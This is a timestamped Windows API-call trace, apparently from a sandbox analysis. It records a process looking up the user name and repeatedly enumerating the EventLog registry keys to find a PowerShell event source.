	[0853.406] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x32c) returned 0x0
	[0853.406] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x0) returned 0x2
	[0853.406] RegOpenKeyExW (in: hKey=0x310, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x330) returned 0x0
	[0853.407] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x0) returned 0x2
	[0853.407] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x334) returned 0x0
	[0853.407] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x338) returned 0x0
	[0853.407] RegCloseKey (hKey=0x338) returned 0x0
	[0853.407] RegCloseKey (hKey=0x310) returned 0x0
	[0853.408] RegCloseKey (hKey=0x334) returned 0x0
	[0853.425] CoTaskMemAlloc (cb=0x804) returned 0x1ba30f90
	[0853.426] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba30f90, nSize=0x22d808 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d808) returned 0x1
	[0853.427] CoTaskMemFree (pv=0x1ba30f90) 
	[0853.428] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0853.428] GetUserNameW (in: lpBuffer=0x414760, pcbBuffer=0x22d848 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d848) returned 1
	[0853.428] CoTaskMemFree (pv=0x414760) 
	[0854.822] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x33c) returned 0x0
	[0854.822] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d4bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d4b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d4bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d4b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.822] CoTaskMemFree (pv=0x0) 
	[0854.822] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.822] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.822] CoTaskMemFree (pv=0x414760) 
	[0854.822] CoTaskMemFree (pv=0x0) 
	[0854.822] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.822] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.822] CoTaskMemFree (pv=0x414760) 
	[0854.822] CoTaskMemFree (pv=0x0) 
	[0854.822] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.822] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.822] CoTaskMemFree (pv=0x414760) 
	[0854.822] CoTaskMemFree (pv=0x0) 
	[0854.822] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.822] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.822] CoTaskMemFree (pv=0x414760) 
	[0854.822] CoTaskMemFree (pv=0x0) 
	[0854.823] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.823] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.823] CoTaskMemFree (pv=0x414760) 
	[0854.823] CoTaskMemFree (pv=0x0) 
	[0854.823] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.823] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.823] CoTaskMemFree (pv=0x414760) 
	[0854.823] CoTaskMemFree (pv=0x0) 
	[0854.823] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.823] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.823] CoTaskMemFree (pv=0x414760) 
	[0854.823] CoTaskMemFree (pv=0x0) 
	[0854.823] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.823] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.823] CoTaskMemFree (pv=0x414760) 
	[0854.823] CoTaskMemFree (pv=0x0) 
	[0854.823] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.823] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.823] CoTaskMemFree (pv=0x414760) 
	[0854.823] CoTaskMemFree (pv=0x0) 
	[0854.823] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x340) returned 0x0
	[0854.823] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.823] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x344) returned 0x0
	[0854.824] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.824] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x348) returned 0x0
	[0854.824] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.824] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x34c) returned 0x0
	[0854.824] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.824] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x350) returned 0x0
	[0854.824] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.824] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x354) returned 0x0
	[0854.824] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.824] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x358) returned 0x0
	[0854.824] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.825] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x35c) returned 0x0
	[0854.825] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.825] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x360) returned 0x0
	[0854.825] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x364) returned 0x0
	[0854.825] RegCloseKey (hKey=0x364) returned 0x0
	[0854.825] RegCloseKey (hKey=0x33c) returned 0x0
	[0854.825] RegCloseKey (hKey=0x360) returned 0x0
	[0854.826] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x360) returned 0x0
	[0854.826] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d4bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d4b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d4bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d4b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.826] CoTaskMemFree (pv=0x0) 
	[0854.826] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.826] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.826] CoTaskMemFree (pv=0x414760) 
	[0854.826] CoTaskMemFree (pv=0x0) 
	[0854.826] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.826] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.827] CoTaskMemFree (pv=0x414760) 
	[0854.827] CoTaskMemFree (pv=0x0) 
	[0854.827] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.827] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.827] CoTaskMemFree (pv=0x414760) 
	[0854.827] CoTaskMemFree (pv=0x0) 
	[0854.827] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.827] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.827] CoTaskMemFree (pv=0x414760) 
	[0854.827] CoTaskMemFree (pv=0x0) 
	[0854.827] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.827] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.827] CoTaskMemFree (pv=0x414760) 
	[0854.827] CoTaskMemFree (pv=0x0) 
	[0854.827] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.827] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.827] CoTaskMemFree (pv=0x414760) 
	[0854.827] CoTaskMemFree (pv=0x0) 
	[0854.827] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.827] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.827] CoTaskMemFree (pv=0x414760) 
	[0854.827] CoTaskMemFree (pv=0x0) 
	[0854.827] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.827] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.828] CoTaskMemFree (pv=0x414760) 
	[0854.828] CoTaskMemFree (pv=0x0) 
	[0854.828] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.828] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x414760, lpcchName=0x22d548, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d548, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.828] CoTaskMemFree (pv=0x414760) 
	[0854.828] CoTaskMemFree (pv=0x0) 
	[0854.828] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x33c) returned 0x0
	[0854.828] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.828] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x364) returned 0x0
	[0854.828] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.828] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x368) returned 0x0
	[0854.828] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.828] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x36c) returned 0x0
	[0854.828] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.829] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x370) returned 0x0
	[0854.829] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.829] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x374) returned 0x0
	[0854.829] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.829] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x378) returned 0x0
	[0854.829] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.829] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x37c) returned 0x0
	[0854.829] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x0) returned 0x2
	[0854.829] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x380) returned 0x0
	[0854.829] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5a8 | out: phkResult=0x22d5a8*=0x384) returned 0x0
	[0854.830] RegCloseKey (hKey=0x384) returned 0x0
	[0854.830] RegCloseKey (hKey=0x360) returned 0x0
	[0854.830] RegCloseKey (hKey=0x380) returned 0x0
	[0854.831] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d518 | out: phkResult=0x22d518*=0x380) returned 0x0
	[0854.831] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d48c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d488, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d48c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d488*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.831] CoTaskMemFree (pv=0x0) 
	[0854.831] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.831] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x414760, lpcchName=0x22d518, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d518, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.831] CoTaskMemFree (pv=0x414760) 
	[0854.831] CoTaskMemFree (pv=0x0) 
	[0854.831] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.831] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x414760, lpcchName=0x22d518, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d518, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.831] CoTaskMemFree (pv=0x414760) 
	[0854.831] CoTaskMemFree (pv=0x0) 
	[0854.831] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.831] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x414760, lpcchName=0x22d518, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d518, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.832] CoTaskMemFree (pv=0x414760) 
	[0854.832] CoTaskMemFree (pv=0x0) 
	[0854.832] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.832] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x414760, lpcchName=0x22d518, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d518, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.832] CoTaskMemFree (pv=0x414760) 
	[0854.832] CoTaskMemFree (pv=0x0) 
	[0854.832] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.832] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x414760, lpcchName=0x22d518, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d518, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.832] CoTaskMemFree (pv=0x414760) 
	[0854.832] CoTaskMemFree (pv=0x0) 
	[0854.832] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.832] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x414760, lpcchName=0x22d518, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d518, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.832] CoTaskMemFree (pv=0x414760) 
	[0854.832] CoTaskMemFree (pv=0x0) 
	[0854.832] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.832] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x414760, lpcchName=0x22d518, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d518, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.832] CoTaskMemFree (pv=0x414760) 
	[0854.832] CoTaskMemFree (pv=0x0) 
	[0854.832] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.832] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x414760, lpcchName=0x22d518, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d518, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.832] CoTaskMemFree (pv=0x414760) 
	[0854.832] CoTaskMemFree (pv=0x0) 
	[0854.833] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0854.833] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x414760, lpcchName=0x22d518, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d518, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0854.833] CoTaskMemFree (pv=0x414760) 
	[0854.833] CoTaskMemFree (pv=0x0) 
	[0854.833] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x360) returned 0x0
	[0854.833] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x0) returned 0x2
	[0854.833] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x384) returned 0x0
	[0854.833] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x0) returned 0x2
	[0854.833] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x388) returned 0x0
	[0854.833] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x0) returned 0x2
	[0854.833] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x38c) returned 0x0
	[0854.833] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x0) returned 0x2
	[0854.833] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x390) returned 0x0
	[0854.834] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x0) returned 0x2
	[0854.834] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x394) returned 0x0
	[0854.834] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x0) returned 0x2
	[0854.834] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x398) returned 0x0
	[0854.834] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x0) returned 0x2
	[0854.834] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x39c) returned 0x0
	[0854.834] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x0) returned 0x2
